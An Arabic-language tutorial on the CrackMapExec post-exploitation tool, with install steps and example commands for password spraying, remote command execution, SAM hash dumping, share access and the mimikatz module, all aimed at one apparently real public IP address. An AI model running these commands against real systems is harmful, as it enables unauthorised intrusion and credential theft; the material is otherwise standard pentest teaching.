شنو هي CrackMapExec؟
هي أداة مفتوحة المصدر مكتوبة بلغة Python، ومصممة حتى تساعد مختبري الاختراق على تقييم أمان الشبكات، خصوصًا شبكات Windows اللي تشتغل بنظام Active Directory.
أداة CME تكدر تتعامل ويه بروتوكولات مثل:
smb own stuff using SMB
ftp own stuff using FTP
ssh own stuff using SSH
mssql own stuff using MSSQL
rdp own stuff using RDP
ldap own stuff using LDAP
winrm own stuff using WINRM
شنو تسوي CME؟ (الاستخدامات)
- تحقق من صلاحيات المستخدمين على الأجهزة.
- تنفيذ أوامر عن بعد (Remote Code Execution).
- (Password Spraying / Cracking).
- جمع معلومات حساسة من الشبكة.
- استخراج بيانات المستخدمين، إلخ.
طريقة التثبيت:
بما إنه مكتوبة بـ Python، فتثبيتها سهل كلش. نحتاج أول شي pip و Python3.
على كالي لينكس:
sudo apt update
sudo apt install python3-pip libssl-dev libffi-dev build-essential
pip3 install crackmapexec
أو الطريقة الثانية، من المصدر (إذا تريد أحدث نسخة):
git clone https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
pip3 install -r requirements.txt
python3 setup.py install

أمثلة عملية:
1. فحص SMB على هدف معين:
crackmapexec smb 167.114.21.182
راح يعرضلك معلومات عن الجهاز، الـ OS، النسخة، إذا بيه SMB مفتوح أو لا.\
└─# crackmapexec smb 167.114.21.182
SMB 167.114.21.182 445 PONYX [*] Windows 10 / Server 2019 Build 17763 x64 (name:PONYX) (domain:thetemplehost.com) (signing:True) (SMBv1:False)
2. تسجيل الدخول بمستخدم معين:
crackmapexec smb 167.114.21.182 -u admin -p 123456
إذا كانت الباسورد صحيحة، راح تشوف Login successful، وراح يبينلك صلاحيات المستخدم.
3. تجربة Password Spraying:
crackmapexec smb 167.114.21.182 -u users.txt -p Welcome123
إذا عندك قائمة يوزرات وتريد تجرب باسورد مشترك عليهم.
4. تنفيذ أمر عن بعد:
crackmapexec smb 167.114.21.182 -u admin -p 123456 -x 'whoami'
راح ينفذ الأمر على الهدف ويرجعلك result، إذا كان عندك صلاحيات.
5. استخراج الـ SAM hashes:
crackmapexec smb 167.114.21.182 -u admin -p 123456 --sam
إذا المستخدم عنده صلاحيات، راح يسحب الـ Hashes مال كلمات المرور من SAM database.
6. التعامل ويه ملفات:
crackmapexec smb 167.114.21.182 -u admin -p 123456 --shares
راح يجيبلك كل الـ Shares المتوفرة، وتكدر تسحب أو ترفع ملفات حسب الصلاحيات.
شنو الفايدة منها بالريد تيم أو Bug Bounty؟
تستخدم بعمليات Internal Pentest وRed Teaming. مثلاً إذا دخلت لشبكة بعد استغلال ضعف، تكدر تستخدم CME حتى توسع تحكمك على بقية الأجهزة وتكتشف Accounts وPrivileges أخرى.
يعني أداة ما بعد الاستغلال (Post Exploitation)، مو بس Scan وفحص.
موديولات إضافية (Modules)
تدعم موديولات تكدر تضيفها حتى توسع وظايفها، مثل:
- Mimikatz (للحصول على كلمات المرور من الذاكرة)
- KeeThief
- DCSync
مثال:
crackmapexec smb 167.114.21.182 -u admin -p 123456 -M mimikatz